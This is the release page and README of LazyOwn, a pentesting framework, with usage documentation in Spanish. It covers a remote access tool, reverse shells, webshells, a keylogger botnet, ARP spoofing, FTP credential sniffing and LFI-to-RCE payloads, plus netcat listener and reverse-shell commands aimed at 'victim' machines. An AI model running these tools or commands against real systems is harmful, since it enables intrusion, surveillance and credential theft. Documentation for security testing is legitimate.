LazyOwn v0.1.1 Release

[grisuno]

Full Changelog: release/0.0.14...release/0.1.1

LazyOwn

██╗      █████╗ ███████╗██╗   ██╗ ██████╗ ██╗    ██╗███╗   ██╗
██║     ██╔══██╗╚══███╔╝╚██╗ ██╔╝██╔═══██╗██║    ██║████╗  ██║
██║     ███████║  ███╔╝  ╚████╔╝ ██║   ██║██║ █╗ ██║██╔██╗ ██║
██║     ██╔══██║ ███╔╝    ╚██╔╝  ██║   ██║██║███╗██║██║╚██╗██║
███████╗██║  ██║███████╗   ██║   ╚██████╔╝╚███╔███╔╝██║ ╚████║
╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═══╝

LazyOwn Framework is a powerful and versatile security framework designed to automate and streamline pentesting and vulnerability analysis tasks. This interactive environment combines multiple tools and scripts, making it easier for cybersecurity professionals to work through various stages of the security assessment lifecycle. With an intuitive command-line interface, LazyOwn allows users to configure specific parameters, execute custom scripts, and obtain real-time results, all from a single platform.

Key Features:

Interactive Interface:

Interactive shell with user-friendly commands for configuring and running scripts.
Ability to display and adjust custom parameters applicable to different scripts.
Task Automation:

Automates common pentesting tasks such as vulnerability scanning, web application fuzzing, brute force attacks, and more.
Integration with popular tools and custom scripts for comprehensive testing coverage on Parrot Sec.
Real-Time Visualization:

Real-time output display of script execution, allowing users to see results instantly and react swiftly.
Modularity and Extensibility:

Designed to be extensible, enabling users to easily add and customize scripts.
Supports multiple scripting languages, including Python and Bash.
Flexible Configuration:

Ability to set specific parameters like IP addresses, API keys, HTTP methods, request data, and more, providing complete control over executed scripts.
Typical Use:

Parameter Configuration:

Users can set required parameters using commands like set target_ip 192.168.1.1 to define the target IP address.
Script Execution:

Execute predefined scripts for various tasks, such as run lazygptcli to interact with GPT using a configured prompt and API key.
Results Visualization:

Script results are displayed in the console in real-time, providing immediate feedback on progress and findings.
Additional Modules:

LazyOwn includes various specialized modules such as:

lazyownrat and lazyownratcli: For running remote access tools with configurable parameters.
lazyftpsniff and lazysniff: For network sniffing on specified interfaces.
lazysearch_bot and lazygptcli: For interacting with search APIs and GPT-based tools.
lazyhoneypot: For setting up email-based honeypots.
lazynetbios: For NetBIOS enumeration across IP ranges.
lazywerkzeugdebug: For testing Werkzeug in debug mode.
Background:

Originally designed to automate the search and analysis of binaries with special permissions on Linux and Windows systems, LazyOwn has evolved to encompass a broader range of functionalities. The project includes scripts that extract information from GTFOBins, analyze binaries on the system, and generate options based on the collected data.

LazyOwn on Reddit

Revolutionize Your Pentesting with LazyOwn: Automate the intrusion on Linux, MAC OSX, and Windows VICTIMS

https://www.reddit.com/r/LazyOwn/

LazyOwn_.Transform.Pentesting.with.Automation.mp4

Discover LazyOwn, the ultimate solution for automating the pentesting workflow to attack Linux, MacOSX and Windows systems. Our powerful tool simplifies pentesting, making it more efficient and effective. Watch this video to learn how LazyOwn can streamline your security assessments and enhance your cybersecurity toolkit.

LazyOwn> set target_ip 192.168.1.1
[SET] target_ip set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...

LazyOwn es ideal para profesionales de la ciberseguridad que buscan una solución centralizada y automatizada para sus necesidades de pentesting, ahorrando tiempo y mejorando la eficiencia en la identificación y explotación de vulnerabilidades.

Requisitos

• Python 3.x
• Módulos de Python:
  • python-libnmap
  • pwn
  • groq
  • PyPDF2
  • docx
  • python-docx
  • olefile
  • exifread
  • pycryptodome
  • impacket
  • pandas
  • colorama
  • tabulate
  • pyarrow
  • keyboard
  • flask-unsign
  • name-that-hash
• subprocess (incluido en la biblioteca estándar de Python)
• platform (incluido en la biblioteca estándar de Python)
• tkinter (Opcional para el GUI)
• numpy (Opcional para el GUI)

Instalación

1. Clona el repositorio:

git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn

2. Instala las dependencias de Python:

./install.sh

Uso

./run or ./fast_run_as_r00t.sh 

Use set <parameter> <value> to set parameters.
Use show to display current parameter values.
Use run <script_name> to execute a script with the set parameters.
Use exit to exit the CLI.
Una vez que el shell esté en funcionamiento, puedes utilizar los siguientes comandos:

list: Lista todos los Modulos de LazyOwn
set <parámetro> <valor>: Establece el valor de un parámetro. Por ejemplo, set target_ip 192.168.1.1.
show: Muestra los valores actuales de todos los parámetros.
run <script>: Ejecuta un script específico disponible en el framework.
Scripts disponibles

LazyOwn> ls
    [+] Available scripts to run: [👽]
lazysearch                lazysearch_gui            lazyown
update_db                 lazynmap                  lazyaslrcheck
lazynmapdiscovery         lazygptcli                lazyburpfuzzer
lazymetaextract0r         lazyreverse_shell         lazyattack
lazyownratcli             lazyownrat                lazygath
lazysniff                 lazynetbios               lazybotnet
lazybotcli                lazyhoneypot              lazysearch_bot
lazylfi2rce               lazylogpoisoning          lazymsfvenom
lazypathhijacking         lazyarpspoofing           lazyftpsniff
lazyssh77enum             lazywerkzeugdebug
LazyOwn> ?

Documented commands (type help <topic>):
========================================
acknowledgearp     dirsearch           lazywebshell     rpcdump
acknowledgeicmp    dnsenum             ldapdomaindump   rubeus
addhosts           dnsmap              list             run
alias              download_exploit    msf              samrdump
arpscan            download_resources  nbtscan          set
asprevbase64       encrypt             nc               sh
banner             enum4linux          nikto            show
bloodhound         exit                nmapscripthelp   smbclient
chisel             fixel               openssl_sclient  smbmap
clean              fixperm             payload          smbserver
clock              getcap              ping             snmpcheck
cme                getnpusers          ports            socat
conptyshell        getseclist          proxy            sqlmap
cp                 gobuster            psexec           ss
cports             gospider            pwd              sshd
createcredentials  hashcat             py3ttyup         tcpdump_icmp
createhash         help                pyautomate       vpn
createrevshell     ignorearp           qa               wfuzz
createwebshell     ignoreicmp          responder        whatweb
createwinrevshell  ip                  rev              winbase64payload
decrypt            john2hash           rhost            wrapper
dig                lazypwn             rpcclient        www

Tag en youtube

https://www.youtube.com/hashtag/lazyown

LazyOwn> set binary_name my_binary
LazyOwn> set target_ip 192.168.1.100
LazyOwn> set api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit

para las busquedas

python3 lazysearch.py binario_a_buscar

Busquedas con GUI

Características adicionales y cambios:
AutocompleteEntry:

Se ha agregado un filtro para eliminar valores None de la lista de autocompletar.
Nuevo Vector de Ataque:

Añadido un botón "Nuevo Vector de Ataque" en la interfaz principal.
Implementada la funcionalidad para agregar un nuevo vector de ataque y guardar los datos actualizados en los archivos Parquet.
Exportar a CSV:

Añadido un botón "Exportar a CSV" en la interfaz principal.
Implementada la funcionalidad para exportar los datos del DataFrame a un archivo CSV seleccionado por el usuario.
Uso:
Agregar un nuevo vector de ataque: Hacer clic en el botón "Nuevo Vector de Ataque", llenar los campos y guardar.
Exportar a CSV: Hacer clic en el botón "Exportar a CSV" y seleccionar la ubicación para guardar el archivo CSV.

Nueva Función scan_system_for_binaries:

Implementa la búsqueda de binarios en el sistema utilizando el comando file para determinar si un archivo es binario.
Se utiliza os.walk para recorrer el sistema de archivos.
Los resultados se muestran en una nueva ventana de la GUI.
Botón para Buscar Binarios:

Se ha añadido un botón "Buscar Binarios en el Sistema" en la interfaz principal que llama a la función scan_system_for_binaries.
Nota:
La función is_binary utiliza el comando file de Unix para determinar si un archivo es un ejecutable binario. Si estás en un sistema operativo diferente, necesitarás ajustar este método para que sea compatible.
Esta implementación puede ser intensiva en recursos, ya que recorre todo el sistema de archivos. Podrías añadir opciones adicionales para limitar la búsqueda a directorios específicos o añadir un filtro para ciertos tipos de archivos.

python3 LazyOwnExplorer.py

para ejecutar una busqueda contra la maquina a analizar

python3 lazyown.py

en el caso de querer actualizar hacemos

cd LazyOwn
rm *.csv
rm *.parquet
./update_db.sh

El proyecto consta de tres scripts principales:

1. search.py
   Este script extrae información de binarios y sus funciones desde GTFOBins y la guarda en un archivo CSV. ya hice el scraping así que mejor evitar y usar la db que ya tiene en formato csv, a menos que quieran actualizar la db

import requests
from bs4 import BeautifulSoup
import csv

# URL del servidor que contiene el HTML
url = "https://gtfobins.github.io/index.html"

# Hacer una solicitud GET al servidor
response = requests.get(url)

# Verificar si la solicitud fue exitosa
if response.status_code == 200:
    html_content = response.text
else:
    print("Error al obtener el HTML del servidor")
    exit()

# Parsear el contenido HTML con Beautiful Soup
soup = BeautifulSoup(html_content, 'html.parser')

# Encontrar el contenedor de la tabla
table_wrapper = soup.find('div', id='bin-table-wrapper')

# Inicializar una lista para almacenar la información
data = []

# Recorrer todas las filas de la tabla
for row in table_wrapper.find_all('tr'):
    bin_name = row.find('a', class_='bin-name')
    if bin_name:
        bin_name_text = bin_name.text.strip()
        functions = []
        for func in row.find_all('li'):
            function_link = func.find('a')
            if function_link:
                function_href = function_link.get('href').strip()
                function_name = function_link.text.strip()
                functions.append({'name': function_name, 'href': function_href})
        
        # Añadir la información a la lista de datos
        data.append({'binary': bin_name_text, 'functions': functions})

# Guardar la información en un archivo CSV
csv_file = "bin_data.csv"
with open(csv_file, mode='w', newline='') as file:
    writer = csv.writer(file)
    writer.writerow(['Binary', 'Function Name', 'Function URL'])
    for entry in data:
        binary = entry['binary']
        for func in entry['functions']:
            writer.writerow([binary, func['name'], func['href']])

print(f"Datos guardados en {csv_file}")

2. detailed_search.py

Este script lee el archivo CSV generado por scrape_bins.py, extrae detalles adicionales de cada función y guarda los datos en un segundo archivo CSV.

import requests
from bs4 import BeautifulSoup
import csv
from urllib.parse import urljoin
import time
import os

# URL base del servidor
base_url = "https://gtfobins.github.io/"

# Nombre del archivo CSV de entrada
input_csv = "bin_data.csv"

# Nombre del archivo de salida CSV
output_csv = "bin_data_relevant.csv"

# Función para obtener la información relevante de una URL
def obtener_informacion(url):
    response = requests.get(url)
    if response.status_code != 200:
        print(f"Error al obtener la URL: {url}")
        return []
    
    soup = BeautifulSoup(response.text, 'html.parser')
    data = []

    for section in soup.find_all('h2', class_='function-name'):
        function_name = section.text.strip()
        function_id = section.get('id')
        function_url = f"{url}#{function_id}"
        description = section.find_next('p').text.strip() if section.find_next('p') else ""
        example = section.find_next('code').text.strip() if section.find_next('code') else ""

        data.append({
            "function_name": function_name,
            "function_url": function_url,
            "description": description,
            "example": example
        })

    return data

# Leer el archivo CSV de entrada
binarios_funciones = {}
with open(input_csv, mode='r', encoding='utf-8') as file:
    reader = csv.DictReader(file)
    for row in reader:
        binary = row['Binary']
        if binary not in binarios_funciones:
            binarios_funciones[binary] = row['Function URL'].split('#')[0]

# Verificar si ya existe un archivo de salida y hasta dónde se ha procesado
resume = False
if os.path.exists(output_csv):
    with open(output_csv, mode='r', encoding='utf-8') as file:
        reader = csv.reader(file)
        rows = list(reader)
        if len(rows) > 1:
            last_processed = rows[-1][2]
            resume = True

# Inicializar una lista para almacenar toda la información
informacion_binarios = []

# Abrir el archivo CSV para escritura
csv_file = open(output_csv, mode='w', newline='', encoding='utf-8')
csv_writer = csv.writer(csv_file)
csv_writer.writerow(['Binary', 'Function Name', 'Function URL', 'Description', 'Example'])

# Recorrer la lista de binarios y sus funciones
for binary, url in binarios_funciones.items():
    # Si estamos retomando desde un punto anterior, saltamos hasta el último URL procesado
    if resume:
        if url != last_processed:
            continue
        else:
            resume = False
    full_url = urljoin(base_url, url)
    
    informacion = obtener_informacion(full_url)
    for item in informacion:
        informacion_binarios.append({
            "binary": binary,
            "function_name": item["function_name"],
            "function_url": item["function_url"],
            "description": item["description"],
            "example": item["example"]
        })
        # Guardar la información en el archivo CSV
        csv_writer.writerow([binary, item['function_name'], item['function_url'], item['description'], item['example']])
        print(f"[+] Binary: {binary} {item['function_name']}")
    # Hacemos una pausa de 5 segundos entre cada solicitud de URL
    time.sleep(5)

# Cerrar el archivo CSV
csv_file.close()

print(f"Datos guardados en {output_csv}")

3. lazyown.py
   Este script analiza los binarios en el sistema y genera opciones basadas en la información recopilada. Detecta si el sistema operativo es Linux o Windows y ejecuta el comando adecuado para buscar binarios con permisos elevados.

import pandas as pd
import os
import subprocess
import platform

# Lee los CSVs y crea los DataFrames
df1 = pd.read_csv('bin_data.csv')
df2 = pd.read_csv('bin_data_relevant.csv')

# Guarda los DataFrames como Parquet
df1.to_parquet('binarios.parquet')
df2.to_parquet('detalles.parquet')

# Función para realizar la búsqueda y generar el CSV de salida
def buscar_binarios():
    binarios_encontrados = set()
    
    # Detecta el sistema operativo
    sistema_operativo = platform.system()
    
    if sistema_operativo == 'Linux':
        # Ejecuta el comando find para Linux
        result = subprocess.run(['find', '/', '-perm', '4000', '-ls'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        output = result.stdout
        
        # Extrae los binarios encontrados
        for line in output.split('\n'):
            if line:
                binario = os.path.basename(line.split()[-1])
                binarios_encontrados.add(binario)
    
    elif sistema_operativo == 'Windows':
        # Script de PowerShell para Windows
        powershell_script = """
        $directories = @("C:\\Windows\\System32", "C:\\", "C:\\Program Files", "C:\\Program Files (x86)")
        foreach ($dir in $directories) {
            Get-ChildItem -Path $dir -Recurse -Filter *.exe -ErrorAction SilentlyContinue | 
            ForEach-Object {
                $acl = Get-Acl $_.FullName
                $privileges = $acl.Access | Where-Object { $_.FileSystemRights -match "FullControl" }
                if ($privileges) {
                    Write-Output "$($_.FullName)"
                }
            }
        }
        """
        
        # Ejecuta el script de PowerShell
        result = subprocess.run(['powershell', '-Command', powershell_script], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        output = result.stdout
        
        # Extrae los binarios encontrados
        for line in output.split('\n'):
            if line:
                binario = os.path.basename(line.strip())
                binarios_encontrados.add(binario)
    
    # Filtra el DataFrame principal con los binarios encontrados
    df_binarios_encontrados = df1[df1['Binary'].isin(binarios_encontrados)]
    
    # Genera un CSV con los detalles de los binarios encontrados
    with open('resultado.csv', 'w') as f:
        for binario in binarios_encontrados:
            detalles = df2[df2['Binary'] == binario]
            if not detalles.empty:
                f.write(detalles.to_csv(index=False, header=False))
                print(detalles.to_csv(index=False, header=False))

# Función para ejecutar opciones basadas en los datos encontrados
def ejecutar_opciones():
    df_resultado = pd.read_csv('resultado.csv', header=None, names=['Binary', 'Function Name', 'Function URL', 'Description', 'Example'])
    
    for binario in df_resultado['Binary'].unique():
        print(f"Binario encontrado: {binario}")
        detalles = df_resultado[df_resultado['Binary'] == binario]

        print("Opciones:")
        for i, (_, row) in enumerate(detalles.iterrows(), start=1):
            print(f"{i}. {row['Function Name']} - {row['Description']}")
        print(f"{i+1}. No hacer nada y salir")
        
        while True:
            opcion = input("Seleccione una opción: ")
            if opcion.isdigit() and 1 <= int(opcion) <= len(detalles) + 1:
                break
            else:
                print("Opción no válida. Por favor, intente de nuevo.")
        
        opcion = int(opcion)
        
        if opcion <= len(detalles):
            print(f"Ejecutando opción {opcion} para {binario}")
            # Código para ejecutar la opción correspondiente
            print(f"Ejemplo de ejecución:\n{detalles.iloc[opcion-1]['Example']}")
            # Aquí puedes agregar el código para ejecutar el ejemplo si es necesario
        else:
            print("Saliendo")
            break

if __name__ == '__main__':
    buscar_binarios()
    ejecutar_opciones()

Uso modo LazyOwn WebShells

LazyOwn Webshell Collection es una colleccion de webshells para nuestro framework, el cual nos permite mediante distintos lenguajes establecer una webshell en la maquina donde ejecutemos lazyown webshell basicamente lo que hace es levantar un servidor web dentro del directorio modules para que así esté visible mediante el navegador así podemos tanto disponivilizar los modulos por separados mediante web como tambien podemos acceder al directorio cgi-bin en donde hay 4 shells una bash otra en perl otra en python y en asp por
si fuera un windwos

lazywebshell

y listo ya podemos acceder a cualquiera de estas url:

http://localhost:8080/cgi-bin/lazywebshell.sh

http://localhost:8080/cgi-bin/lazywebshell.py

http://localhost:8080/cgi-bin/lazywebshell.asp

http://localhost:8080/cgi-bin/lazywebshell.cgi

Uso Lazy MSFVenom para Reverse Shell

se crearán 3 archivos uno para windows uno para linux y uno para mac con el nombre shell.exe, shell.elf, shell.macho respectivamente y se invoca con el comando run lazymsfvenom

run lazymsfvenom

Uso Lazy PATH Hijacking

se crearán un archivo en /tmp con el nombre de binary_name seteado en payload inicializado con gzip en memoria y como bash en payload parasetear el payload desde el json usar el comando payload para ejecutar usar:

lazypathhijacking

Uso modo LazyOwn RAT

LazyOwn RAT es una sencilla pero potente Remote Admin Tool Cuenta con una funcion de Screenshot, el cual captura la pantalla del servidor, tiene un comando upload, el cual nos permite subir archivos a la maquina comprometida, y un modo C&C donde podran enviar comandos al servidor, cuenta con dos modos en modo cliente y modo servidor, no tiene ningun tipo de ofuscación y la rat me base en BasicRat acá su github https://github.com/awesome-security/basicRAT y en https://github.com/hash3liZer/SillyRAT aun que está ultima es mucho más completa yo solo queria sacar pantallasos subir archivos y enviar comandos, quizas más adelante agregar funcionalidad de mirar webcams, pero eso más adelante.

usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key

usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key

LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set

LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set

luego los comandos son:

upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C

Uso modo Lazy Meta Extract0r

LazyMeta Extract0r es una herramienta diseñada para extraer metadata de varios tipos de archivos, incluidos PDF, DOCX, archivos OLE (como DOC y XLS), y varios formatos de imágenes (JPG, JPEG, TIFF). Esta herramienta recorrerá un directorio especificado, buscará archivos con extensiones compatibles, extraerá la metadata y la guardará en un archivo de salida.

[*] Iniciando: LazyMeta extract0r [;,;]

usage: lazyown_metaextract0r.py [-h] --path PATH
lazyown_metaextract0r.py: error: the following arguments are required: --path

python3 lazyown_metaextract0r.py --path /home/user

Uso modo decrypt encrypt

un metodo de cifrado el cual nos permite tanto encryptar archivos como decencriptar los si se cuenta con la llave obviamente:

encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt

Uso modo LazyNmap

El uso Lazynmap nos proporciona un script automatizado de un target en este caso 127.0.0.1 utilizando nmap el scipr requiere permisos de administración mediante sudo.
tambien tiene un modulo de net discovery para saber que hay en el segmento de ip en el que te encuentras.

./lazynmap.sh -t 127.0.0.1 

Uso modo Chat Generativo por Consola LazyOwn GPT One Liner CLI Assistant y researcher

¡Descubre la revolución en automatización de tareas de pentesting con el LazyOwn GPT One Liner CLI Assistant! Este increíble script forma parte de la suite de herramientas LazyOwn, diseñadas para hacer tu vida como pentester más eficiente y productiva.

🚀 Principales Características:

Automatización Inteligente: Utiliza la potencia de Groq y modelos avanzados de lenguaje natural para generar comandos precisos y eficientes basados en tus necesidades específicas.
Interfaz Amigable: Con un simple prompt, el asistente genera y ejecuta scripts de una línea, reduciendo drásticamente el tiempo y esfuerzo en la creación de comandos complejos.
Mejora Continua: Transforma y optimiza continuamente su base de conocimientos para proporcionarte las mejores soluciones, adaptándose a cada situación.
Depuración Simplificada: Habilita el modo debug para obtener información detallada de cada paso, facilitando la identificación y corrección de errores.
Integración Perfecta: Funciona sin problemas con tu entorno de trabajo, aprovechando el poder de la API de Groq para ofrecerte respuestas rápidas y precisas.

🔒 Seguridad y Control:

Manejo Seguro de Errores: Detecta y responde inteligentemente a errores de ejecución, asegurando que siempre tengas el control total de cada comando generado.
Ejecución Controlada: Antes de ejecutar cualquier comando, solicita tu confirmación, brindándote la tranquilidad de saber exactamente qué se está ejecutando en tu sistema.

🌐 Configuración Sencilla:

Configura tu API key en segundos y comienza a disfrutar de todas las ventajas que ofrece el LazyOwn GPT One Liner CLI Assistant.
La guía de inicio rápido está disponible para ayudarte a configurar y sacar el máximo provecho de esta poderosa herramienta.

🎯 Ideal para Pentesters y Desarrolladores:

Optimiza tus Procesos: Simplifica y acelera la generación de comandos en tus auditorías de seguridad.
Aprendizaje Continuo: La base de conocimientos se actualiza y mejora constantemente, proporcionándote siempre las mejores prácticas y soluciones más recientes.
Con el LazyOwn GPT One Liner CLI Assistant, transforma tu forma de trabajar, haciéndola más rápida, eficiente y segura. ¡No pierdas más tiempo en tareas repetitivas y complejas, y enfócate en lo que realmente importa: descubrir y solucionar vulnerabilidades!

¡Únete a la revolución del pentesting con LazyOwn y lleva tu productividad al siguiente nivel!

[?] Uso: python lazygptcli.py --prompt "" [--debug]

[?] Opciones:
--prompt "El prompt para la tarea de programación (requerido)."
--debug, -d "Habilita el modo debug para mostrar mensajes de depuración."
--transform "Transforma la base de conocimientos original en una base mejorada usando Groq."

[?] Asegúrate de configurar tu API key antes de ejecutar el script:
export GROQ_API_KEY=<tu_api_key>
[->] visit: https://console.groq.com/docs/quickstart not sponsored link

Requisitos:
Python 3.x
Una API key válida de Groq
Pasos para Obtener la API Key de Groq:
Visita Groq Console (https://console.groq.com/docs/quickstart) para registrarte y obtener una API key.

export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]          

Uso de modo lazyown_bprfuzzer.py

Proporcionar los argumentos según las solicitudes del script: El script solicitará los siguientes argumentos:
usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA]
[--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE]

lazyburp.py: error: the following arguments are required: --url
--url: La URL a la que se enviará la solicitud (obligatorio).
--method: El método HTTP a utilizar, como GET o POST (opcional, valor predeterminado: GET).
--headers: Los encabezados de la solicitud en formato JSON (opcional, valor predeterminado: {}).
--params: Los parámetros de la URL en formato JSON (opcional, valor predeterminado: {}).
--data: Los datos del formulario en formato JSON (opcional, valor predeterminado: {}).
--json_data: Los datos JSON para la solicitud en formato JSON (opcional, valor predeterminado: {}).
--proxy_port: El puerto del proxy interno (opcional, valor predeterminado: 8080).
-w, --wordlist: La ruta del diccionario para el modo de fuzzing (opcional).
-hc, --hide_code: El código de estado HTTP para ocultar en la salida (opcional).

python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'

Forma 2: Uso Avanzado
Si deseas aprovechar las características avanzadas del script, como el modo de repetición o fuzzing, sigue estos pasos:

Repetición de solicitudes:

Para utilizar la funcionalidad de repetición de solicitudes, proporciona los argumentos como se indicó anteriormente.
Durante la ejecución, el script preguntará si deseas repetir la solicitud. Ingresa 's' para repetir o 'n' para finalizar el repetidor.
Fuzzing:

Para usar la funcionalidad de fuzzing, asegúrate de proporcionar un diccionario de palabras con el argumento -w o --wordlist.
El script reemplazará la palabra LAZYFUZZ en la URL y otros datos con las palabras del diccionario proporcionado.
Durante la ejecución, el script mostrará los resultados de cada iteración de fuzzing.
Estas son las formas básicas y avanzadas de usar el script lazyburp.py. Dependiendo de tus necesidades, puedes elegir la forma que mejor se adapte a tu situación específica.

python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
    -hc 501

python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
 

PD: para usar el diccionario que utilizo realizar dentro de /usr/share/seclist el siguiente comando

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

Uso modo LazyOwn FTP Sniff

este modulo sirve para buscar claves en la red de servidores ftp, algunos me dirán que no se ya no se usa pero se sorprenderian en los entornos productivos en infraestructura critica que e visto maquinas con FTP's masivos corriendo en sus servidores :)

set device eth0
run lazyftpsniff

Uso modo LazyReverseShell

primero nos ponemos en escucha con el comando

nc -nlvp 1337 #o el puerto que escojamos 

para luego en la maquina victima

./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337

Uso modo Lazy Curl to recon

el modulo está en modules y se usa así:

chmod +x lazycurl.sh

Ejecutar el script con los parámetros deseados. Por ejemplo:

./lazycurl.sh --mode GET --url http://10.10.10.10

Ejemplos de uso

Enviar una solicitud GET:

./lazycurl.sh --mode GET --url http://10.10.10.10

Enviar una solicitud POST:

./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1&param2=value2"

Probar un método TRACE:

./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh

Subir un archivo:

```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txt

Realizar fuerza bruta con una wordlist:

./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txt

Asegúrate de ajustar los parámetros según tus necesidades y de que los valores que pases a las opciones sean válidos para cada caso.

Uso modo ARPSpoofing

el script provee de un ataque de ARPSpoofing mediante scapy en el payload debe ser seteado el lhost rhost y el device que pondràs a arpspoofear

set rhost 192.168.1.100
set lhost 192.168.1.1
set device eth0
run lazyarpspoofing

Uso modo LazyGathering

script que nos provee una visión de rayos x en cuanto al sistema en cuestion donde estamos ejecutando la herramiente

run lazygath

Uso modo Lazy Own Lfi Rfi 2 Rce

El modo Lfi Rfi 2 Rce es par aprobar algunos payloads más conocidos a los parametros de payload.json

payload
run lazylfi2rce

Uso modo LazyOwn Sniffer

https://www.youtube.com/watch?v=_-DDiiMrIlE

El modo sniffer nos permite capturar el trafico de red por interfaces con la opcion -i que es la opción obligatoria, dentro de muchas tras opciones no obligatorias,
usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP]
lazysniff.py: error: the following arguments are required: -i/--interface

usando desde el framework se debe setear device con set device [eth0, wla0,eth1, wlan1, etc] segun sea su interface y luego:

run lazysniff

Uso modo LazyAtack

Este script de pentesting en Bash permite ejecutar una serie de pruebas de seguridad en modo servidor (máquina víctima) o en modo cliente (máquina atacante). Dependiendo del modo seleccionado, ofrece diferentes opciones y funcionalidades para llevar a cabo diversas acciones de prueba de penetración.

Opciones del Script
Modo Servidor:

Ejecuta en la máquina víctima.
Ofrece opciones como iniciar un servidor HTTP, configurar netcat para escuchar conexiones, enviar archivos mediante netcat, configurar una shell reversa, entre otros.
Modo Cliente:

Ejecuta en la máquina atacante.
Ofrece opciones como descargar listas de SecLists, escanear puertos, enumerar servicios HTTP, verificar conectividad, monitorear procesos, ejecutar ataques LFI, entre otros.
Ejemplos de Uso
Uso Básico

./lazyatack.sh --modo servidor --ip 192.168.1.1 --atacante 192.168.1.100

./lazyatack.sh --modo cliente --url http://victima.com --ip 192.168.1.10

Esto ejecuta el script en modo cliente, configurando la URL de la víctima como http://victima.com y la IP de la víctima como 192.168.1.10.

Funciones del Script

Funciones del Script
Descargar SecLists: Descarga y extrae las listas de SecLists para su uso.
Escanear Puertos: Ejecuta un escaneo completo de puertos usando nmap.
Escanear Puertos Específicos: Escanea puertos específicos (22, 80, 443).
Enumerar Servicios HTTP: Enumera servicios HTTP en la URL víctima.
Iniciar Servidor HTTP: Inicia un servidor HTTP en el puerto 80.
Configurar Netcat: Configura netcat para escuchar en el puerto 443.
Enviar Archivo Mediante Netcat: Envía un archivo a una escucha netcat.
Verificar Conectividad: Verifica la conectividad mediante ping y tcpdump.
Verificar Conectividad con Curl: Verifica la conectividad usando curl.
Configurar Shell Reversa: Configura una shell reversa.
Escuchar Shell con Netcat: Escucha una shell con netcat.
Monitorear Procesos: Monitorea los procesos en ejecución.
Ejecutar Wfuzz: Ejecuta un ataque de enumeración de directorios web con wfuzz.
Comprobar Permisos Sudo: Comprueba los permisos de sudo.
Explotar LFI: Explota una vulnerabilidad de inclusión de archivos locales.
Configurar TTY: Configura TTY para una sesión shell más estable.
Eliminar Archivos de Forma Segura: Elimina archivos de forma segura.
Obtener Root Shell mediante Docker: Obtiene una root shell mediante Docker.
Enumerar Archivos con SUID: Enumera archivos con permisos SUID.
Listar Timers de Systemd: Lista timers de systemd.
Comprobar Rutas de Comandos: Comprueba rutas de comandos.
Abusar de Tar: Abusa de tar para ejecutar una shell.
Enumerar Puertos Abiertos: Enumera puertos abiertos.
Eliminar Contenedores Docker: Elimina todos los contenedores Docker.
Escanear Red: Escanea la red con secuencia y xargs.

Experimental LazyOwnWebShell en python

Corre en http://localhost:5000 experimental, ya que aun no funciona la salida de la webshell de cara al navegador. pero los comandos si son ejecutados correctamente. por eso está en modo experimental... por no decir que aun tiene bugs xD

python3 main.py 

Experimental ofuscación mediante pyinstaller

esto está en modo experimental y no funciona del todo, ya que tiene un problema de rutas. pronto ya contará con ofuscación mediante pyinstaller

./py2el.sh

Experimental exploit netbios

esto está en modo experimental ya que aun no funciona... (proximamente quizas una implementacion de eternalblue entre otras cositas...)

run lazynetbios

Experimental LazyBotNet con keylogger para windows y Linux

esto está en modo experimental y no funciona la desencriptación del log del keylogger xD
acá vemos por primera vez en accion el comando payload el cual nos setea toda la config en nuestro payload.json así podemos precargar la config antes de arrancar con el framework

payload
run lazybotnet

Menús Interactivos

El script presenta menús interactivos para seleccionar las acciones a realizar. En modo servidor, muestra opciones relevantes para la máquina víctima, y en modo cliente, muestra opciones relevantes para la máquina atacante.

Interrupción Limpia
El script maneja la señal SIGINT (usualmente generada por Control + C) para salir limpiamente.

Licencia

